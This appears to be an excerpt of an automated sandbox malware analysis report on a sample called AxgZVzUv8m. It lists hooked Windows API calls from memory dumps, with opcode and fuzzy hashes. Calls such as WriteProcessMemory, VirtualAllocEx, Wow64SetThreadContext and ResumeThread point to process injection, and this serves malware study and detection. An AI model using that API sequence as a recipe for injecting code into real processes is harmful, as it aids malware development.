                  • Instruction ID: c8d3adaa32e9d77cbfa72c24f4341e956c82ec52e8ffcb9d60bbe122ab2d1181
                  • Instruction Fuzzy Hash: 5B118271A042409FEB50CF19DC857A6FBE8EF05720F08C5AADD45CB251D775E404CA72

                  Control-flow Graph (image not reproduced; basic blocks 6750522-67505ae, calls GetFileType)
                  APIs
                  • GetFileType.KERNELBASE(?,00000E24,140FD3B7,00000000,00000000,00000000,00000000), ref: 06750575
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: 29b552c77a9c7099ae421e2adc26b1a77e143d192da16f5cceed748d6be950fb
                  • Instruction ID: 2a67b1249642dd2f786ce67455c9d93ccd9a4fdc3871657b238d911327fe0a79
                  • Instruction Fuzzy Hash: 6401D275904244AFF720CB05DC85FB6FBA8EF44724F05C09AEE458F241D7B4E5448AB6

                  Control-flow Graph (image not reproduced; basic blocks 6750ec2-6750f49, calls K32EnumProcesses)
                  APIs
                  • K32EnumProcesses.KERNEL32(?,?,?,140FD3B7,00000000,?,?,?,?,?,?,?,?,6D003C58), ref: 06750F02
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: EnumProcesses
                  • String ID:
                  • API String ID: 84517404-0
                  • Opcode ID: c51ffdc3e1caf3c9d032adee188f521322b756355a9405fa1e428ab81d281fbf
                  • Instruction ID: f123fed95ae2ec94aa354d101a9170d05d89fb5aee742ad234289c7c81d51a1e
                  • Instruction Fuzzy Hash: 3F116D759042449FEB50CF65D884BA6FBE4EF04720F09C4AAED49CB691D3B5E444CFA2
                  APIs
                  • SetFileAttributesW.KERNELBASE(?,?), ref: 06750937
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: a5dd89a0ed9e6b30c0f38da370f9948b28d2b0a6fd60f8f5c0fd2ceba09318bd
                  • Instruction ID: 20f5eb40f37a08c572a04a288fc18871afea97356531b9d46d15d28aee7a8b72
                  • Instruction Fuzzy Hash: 010180719042449FFB50CF25DC847A6FBE4EF45720F09C4AADD45CB656D3B5E404CAA2
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06750BFC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: ee68a3339cd79406c966590aa49c17e021845c9881f11f75bc74386c15ba8eb7
                  • Instruction ID: 9ecd578f4fa91d6a24b2cdd3ba0196c258f8cbddaf54ee38bde569951afb9f9e
                  • Instruction Fuzzy Hash: F8018B755006049FEB20CF15D884BA6FBE4EF05324F08C0AADD458B661D3B1E858DBA2
                  APIs
                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0069B16D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: LibraryLoadShim
                  • String ID:
                  • API String ID: 1475914169-0
                  • Opcode ID: a1a8cc491aef96fcd6740274593d9fbef3bb8669b5e434930fdac2c09159dcff
                  • Instruction ID: 3fad04bfbcdd07d7b11e4b2c704b1a6fbebac4cf1a591aa5cfa5817c3ece6052
                  • Instruction Fuzzy Hash: 81018C715006409FEB20CE15ED84B62FBE8EF15720F08809ADD498BB52D374E808CA62
                  APIs
                  • GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 0069BDE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileInfoVersion
                  • String ID:
                  • API String ID: 2427832333-0
                  • Opcode ID: ed5ad3d1ec7d2c94ebb0d61afee78b264020d662469f590bf680d6e85e84a428
                  • Instruction ID: d65f557c1017f96ac4f7dbfc698ae171e4b5cc8963d9f14933972eeb0a52d3e0
                  • Instruction Fuzzy Hash: A601D2715002009FEF208F16ED40BA6FBE8EF14720F0880AAEE458BB51D331E818CF62
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0069A512
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: c6ef93c08eb8920f7b2df749badf5a7227b3cca90e46efeefdd2c46aa2882362
                  • Instruction ID: 9e16b4aed57658467cac316d08bf6b00e5500d52ff9d18e8103f8abab4761de6
                  • Instruction Fuzzy Hash: 3F018B31504640AFEF208F95D844B52FBE5EF08724F0888AADE498BA51C336A424DFA2
                  APIs
                  • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 0069BD33
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FileInfoSizeVersion
                  • String ID:
                  • API String ID: 1661704012-0
                  • Opcode ID: a9801b6110729de7b38fd69b38b211adb2fad5d29a7b022e4883dd5daa5e6e45
                  • Instruction ID: e7e655d817411ec9e802ded1a77931406ba25fea326fc46c17ea8e753ce1fd3f
                  • Instruction Fuzzy Hash: B001B1719042449FEF20CF55E9847A2FBE8EF04720F0884AADD488B752D375E808CAA2
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,?,140FD3B7,00000000,?,?,?,?,?,?,?,?,6D003C58), ref: 06750A93
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 79ec7fc3c05e4564a7d0d9592c962a6e8ec5bb33bdeba630ded5fc79b7ae5f68
                  • Instruction ID: 3876f46283d6037f26521eaad65ed5dee73fd6a1ed66480f2cf35ea2e6228559
                  • Instruction Fuzzy Hash: 0801B1745042409FEB50CF15D885B66FBE4EF04324F09C0EADD058B752E3B4E844CBA2
                  APIs
                  • LoadLibraryW.KERNELBASE(?), ref: 0069B888
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 472c0ca9d39f4f7401f55be7bcfbe95771619c843f59413839333ed94ba68001
                  • Instruction ID: 71c7431e0150347e5619eda07912bc161ff29d0eee2e150b8a77dee87e221bc0
                  • Instruction Fuzzy Hash: 5A0171719042409FEB10CF55EA847A6FBECDF45724F08C4AADD098B742D375E404CBA2
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 067504A8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: 48fa71126235a9f4a035f6a5ee4fe2b9cb76638a82f5b92a21ca79df7b5ff04f
                  • Instruction ID: 1dd8d5ce0506284d749013acb322173d68f040d0980881fee2189646eff30d71
                  • Instruction Fuzzy Hash: AD01DF709042409FEB50CF15D8847A6FBE4EF41320F08C4EEDD498F252D3B5A404CAA2
                  APIs
                  • VerLanguageNameW.KERNELBASE(?,00000E24,?,?), ref: 06750082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: LanguageName
                  • String ID:
                  • API String ID: 2060303382-0
                  • Opcode ID: 23b3abae47209736625639b7d3776d0cf14f96bf1a77ffd66f3d5691522cc39f
                  • Instruction ID: 116fc948f5c92adb1a141f827c2bc67e17140c3033a7c7e494306f5754e1a8db
                  • Instruction Fuzzy Hash: 3901A271600200ABD350DF16CC86B26FBE8FB88A20F14811AED095B741D735F916CBE5
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 067502E4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: a7aa828a7daef58ff3ec4b3b63989ffceefec7be3be5c83bc25a0c67d148d79b
                  • Instruction ID: ab6915d8b897ec0a646cb1de512ae73e206efde3e9540a8f673a2ed6aea3a3c7
                  • Instruction Fuzzy Hash: CD01DF719042409FEB50CF65D884BA6FBE4EF45720F08C0EEDD4A8B652D3B5E404CAB2
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06750B40
                  Memory Dump Source
                  • Source File: 00000000.00000002.1594321277.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6750000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: 7af7e9fdac3d99b683bd8c8a357d5a7c5c0ab88bc6b4b6353650ab31abac4f37
                  • Instruction ID: 62685f3664ab49f776e9a50186479f625fd9b143a20ea0c228a0b86a386e4215
                  • Instruction Fuzzy Hash: 78018C75504600DFEB608F55DC84B66FBA0EF05724F08C0AADE468B661C3B5A458CBA2
                  APIs
                  • FreeLibrary.KERNELBASE(?), ref: 0069B92C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 56853efc1dbae55e26945dc19c70234c721926dbc3319b789c1405fc34d5b775
                  • Instruction ID: 08f854c0633452d1cb8f7c321bf537a90b1fa5de797f6fe1221095e1139bbca1
                  • Instruction Fuzzy Hash: D101D6755046049FEB10CF15E9847A1FBE8DF05724F08C0AADE4A8BB51C374E804CEA2
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0069ACB8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 65b7af02b0e4ed6dc2f64213a831dc76a0f670469b8c34955be782ec3b76bb64
                  • Instruction ID: a6980ad0b95696bd2e929a1839f7e615d04a6e71cae8cb10b8de8dbf528be91d
                  • Instruction Fuzzy Hash: E9017C31404604EFEF218F85D844B61FBE5EF18724F08849ADE494BB62C376A858DFA2
                  APIs
                  • GetModuleHandleW.KERNELBASE(?), ref: 0069A274
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: f4b24fb81ade7cd745ab498c3aaa536b9c11d7001c98eae5fa2bf3e2ddbe0bc0
                  • Instruction ID: 339c9578367add1ccd2099cf51714877af6bf2b51c00d98c4afb32f8db5a3d97
                  • Instruction Fuzzy Hash: 8101A2709042409FEB10CF55D984761FBE8EF45724F1CC09ADD058BB52D375E904CAA3
                  APIs
                  • ResumeThread.KERNELBASE(?), ref: 0069A32C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590713706.000000000069A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_69a000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: aba5bf72bcd5b7d5c2d932fa7e852a66ab5e607b23ca4073608190ba8fb8c2c4
                  • Instruction ID: 16df1a580554c767530d7613e76b5d5aae0cfc82b81f5c10c80500a7847aebc3
                  • Instruction Fuzzy Hash: 8DF0AF748042449FEB10CF46D8847A1FBE4EF05724F08C0AADE498B752D379A804CEA3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 82ab16afef51ad4c66280592b0f43cc5a8e6e64efd93fc8383dcbddff24ac7b2
                  • Instruction ID: 9d061d1ad43b05fbd9c81a6a9c1550c0bddb7c7029b3e2d38aeeef6de5a70d01
                  • Instruction Fuzzy Hash: B9E1F6747001109FDB189B38C468A7D7BE7AFCA609F1584BEE40ADB7A1CF7A9C058B51
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1da0c4f11bb1e728d377dee17f1e1f162f067b823cd187efd2433370f9e1464e
                  • Instruction ID: c2aa5c8a6ef2a7fec8ef732d30ef336cbbea6db0689ecf5393c54d8fbcda2067
                  • Instruction Fuzzy Hash: 20D1E6747101009FDB189B38C468B7D7BE7AFCA609F1584BDA40ADB7A4CF7A9C068B51
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7a78f7941c5b331b93460428e8f434fc0bde1444d8aa506afc9f8def321815c
                  • Instruction ID: 6227b422220fa72f48b04c5e43f78694cc11bf5556e37bd395f98489d14b41f8
                  • Instruction Fuzzy Hash: A78106316083958FCB12DB78C854AAA7BF1EF86218B1948BED456CB3A7DB34CC09C751
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d1dd488bb0ecfc32cd603b6578226de579177c96bcc11a01b319a716704097cd
                  • Instruction ID: 10e83a3e7dd9075a15b0738bc7b37e9aca21c93a693908e237d6a9f67e709e23
                  • Instruction Fuzzy Hash: 4431C62060E7D05FDB179B745864BA67FB19F87204B0A44EFD885CF2A7C928481AC766
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b21bdb49912dd0e9d4318fcf33ad153cefdae736cb82959877a251f49a1180dd
                  • Instruction ID: 1bac0cd70bcb4ca9a595d5212a76ccc77ec33d7a23e15a1db2bccf3cd00b586b
                  • Instruction Fuzzy Hash: 2011E430248684EFD711CB14E980F26BBE1EB89708F24C5ACE9494B653C77BE803CA91
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9913e45bacd32ea252a0d26d2ee89bbdbe20513c5d7c998f246bf43a03d746e6
                  • Instruction ID: 12dea9335fa108d8e6f838d12cde8107fc9d991ccea20e37fbf6eb2707964335
                  • Instruction Fuzzy Hash: 6B01AE2140E3C04FDB13A73898B5659BFB0AE43100B1E88EBC4C2CF1ABEA184818D773
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5b9c0047b85b42d4a7c27b839de0b4dfd5acdd8cdb9ea3740a6d2ba272ae509e
                  • Instruction ID: c3ac41618cc9dffb0a7c8baccf76675b1e8199fa28501a8b1d2aaef8846b7290
                  • Instruction Fuzzy Hash: C3117C311497C09FC703CB14D940B11BFB1BF9A318F2986EAE4844B663C3369917DB51
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 39420ea1fd967b9376cbc235b7e64f1d6b2078db4f310013ec364228c3b2c226
                  • Instruction ID: 2bb092f4514062bb9e1e6f9f0ef5e9d4bbe46d25d7ba34fd7e2c09406f105ac9
                  • Instruction Fuzzy Hash: 9101843150D7C44FC303C724B854B21BFA09F93224F1D85EFC8898B693D65A591ADB93
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ba82813baf71164df6644ded42da98e0ec7c6d89927c16d886866d3cb0a4b258
                  • Instruction ID: b71f284da2328eee423961d52bbb2b98ef8f687aa7c29bd68719db265cbb9cd8
                  • Instruction Fuzzy Hash: 38F0A9B650D3806FD7118B069C40862FFB8DF86620709C09FED4987652D125B908CB71
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 423870d645d6d9db5c031f0f24dc02599d9ad664e9d9c650f46ebdfca623b427
                  • Instruction ID: 35553b2bd5057c32a8271ed08d21e69a939a913dd94861a75b935a88134ebd61
                  • Instruction Fuzzy Hash: D4118E34149684DFC712CB10D990B15BBB1EB8A708F28C6EED4494B6A3C33A9803CF41
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0a5f2a4653efe4eb4d600c72e8becf9b3cab2257fb7e480cefd60eda759c5484
                  • Instruction ID: 78584207c2a8ef4312c95d0a44e4f5893e0ca8107a563a33eaa39ae4142a794e
                  • Opcode Fuzzy Hash: 0a5f2a4653efe4eb4d600c72e8becf9b3cab2257fb7e480cefd60eda759c5484
                  • Instruction Fuzzy Hash: 77014070608202DFDB50FB7CD46802D7BE2FB84308B84892DA645C7259EE708C088B86
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bd28dbf71d4ee8e62a83ed0e350296e777db5385feaa077aad4f21ddb999f8f
                  • Instruction ID: 46cb43da30f2cce43fa9a012a1239059d13f79e3032aa5f5aa37cf8f1e23eb1a
                  • Opcode Fuzzy Hash: 0bd28dbf71d4ee8e62a83ed0e350296e777db5385feaa077aad4f21ddb999f8f
                  • Instruction Fuzzy Hash: 2AF0FB35148644DFC205CB44D980F16FBA2EB89718F24C6A9E94907652C737E812DE81
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 302915d7a2c1907005535b8781bbc04639749dd893b448d7e524aaafa8a6c9e6
                  • Instruction ID: 9437e7808302774292e9988a18e51f15e61794164ce523534611f260fbd8b27b
                  • Opcode Fuzzy Hash: 302915d7a2c1907005535b8781bbc04639749dd893b448d7e524aaafa8a6c9e6
                  • Instruction Fuzzy Hash: EEE0EDB66046005BD740CF0BEC418A2F7E8EB84630B18C07BEC4E8B701D279B5088EA5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6aa3be85b8b3e4f2b7e0faf7a92d28c2f30d4aa5a63fe989c5b4f333377c5170
                  • Instruction ID: 2e28ad9ff66e8b0594e6424935c0ff49b5466e08902a145cf910bf85b282814e
                  • Opcode Fuzzy Hash: 6aa3be85b8b3e4f2b7e0faf7a92d28c2f30d4aa5a63fe989c5b4f333377c5170
                  • Instruction Fuzzy Hash: E8E068B56042100BEA608A0BBC004F6FB90EB9033071CC07BDD498A701D23AA21A8BC1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591016371.0000000000A20000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_a20000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 199244b575eb0b2dbd3ca4aa67219147caddd69b3aef9b085f65d3e131d96b38
                  • Instruction ID: 03172d16089589b5cd72752eedeb2630551e1645303d2f2fb07e411adfda907a
                  • Opcode Fuzzy Hash: 199244b575eb0b2dbd3ca4aa67219147caddd69b3aef9b085f65d3e131d96b38
                  • Instruction Fuzzy Hash: 72E092B66046044B9650CF0BEC41462F7E8EB84630B08C07FDD4D8B711D679B509CEA5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7657b2d57b17df3828eae2292ba9f024084f3c38cdd5fdc3f7c907b8819a891e
                  • Instruction ID: 9923c036a977f11cc7131350740c2451b0e6ba9e4aa4025391486a54205f2f90
                  • Opcode Fuzzy Hash: 7657b2d57b17df3828eae2292ba9f024084f3c38cdd5fdc3f7c907b8819a891e
                  • Instruction Fuzzy Hash: A2E08661B5D2900FCB05737C342159E7FE59E96114B1501AFD045C72E3C9590806C397
                  Memory Dump Source
                  • Source File: 00000000.00000002.1591135701.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_ab0000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23e4acfdb4098cf746bfab07351075f82d1e1ded094550ac031bef27419d213e
                  • Instruction ID: d8b599d2450a2cc7222fbe3fb9ded096c0de548aa6dcd1654dab8a3760f3369e
                  • Opcode Fuzzy Hash: 23e4acfdb4098cf746bfab07351075f82d1e1ded094550ac031bef27419d213e
                  • Instruction Fuzzy Hash: 3DD012317501240B890C77BCA015AAE3BDEDFC9654B0000BAE50DC7762CEAA5C0143D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590698487.0000000000692000.00000040.00000800.00020000.00000000.sdmp, Offset: 00692000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_692000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25f42c38214da16d98c6e3fd39cd64f0e43e46b90d26b9978f15033e6591572e
                  • Instruction ID: b810e3d394ecb9efd0bdd6cb1c28a458bfad70bd12752a7095f2d11e024e4bae
                  • Opcode Fuzzy Hash: 25f42c38214da16d98c6e3fd39cd64f0e43e46b90d26b9978f15033e6591572e
                  • Instruction Fuzzy Hash: DBD02E392096824FE7128F0CC1A4BC53BD8AB60B08F0B00F9A8008BB63C328D8C0C200
                  Memory Dump Source
                  • Source File: 00000000.00000002.1590698487.0000000000692000.00000040.00000800.00020000.00000000.sdmp, Offset: 00692000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_692000_AxgZVzUv8m.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 351584d08b5bc82fe4d01efbfd21c7b504a7ff4657043776c5f63092345b9918
                  • Instruction ID: 9afb706502f8892a0584cfa7e1ce938bc01aea2bbe5de6d5fd8fa5d5ca51cc90
                  • Opcode Fuzzy Hash: 351584d08b5bc82fe4d01efbfd21c7b504a7ff4657043776c5f63092345b9918
                  • Instruction Fuzzy Hash: 82D05E342052824BDB15DE0CC2E4F9933D9AB40714F0684E9AC108B762C7A8DCC0CA00

                  Execution Graph

                  Execution Coverage: 29.2%
                  Dynamic/Decrypted Code Coverage: 15.4%
                  Signature Coverage: 11.5%
                  Total number of Nodes: 2000
                  Total number of Limit Nodes: 29
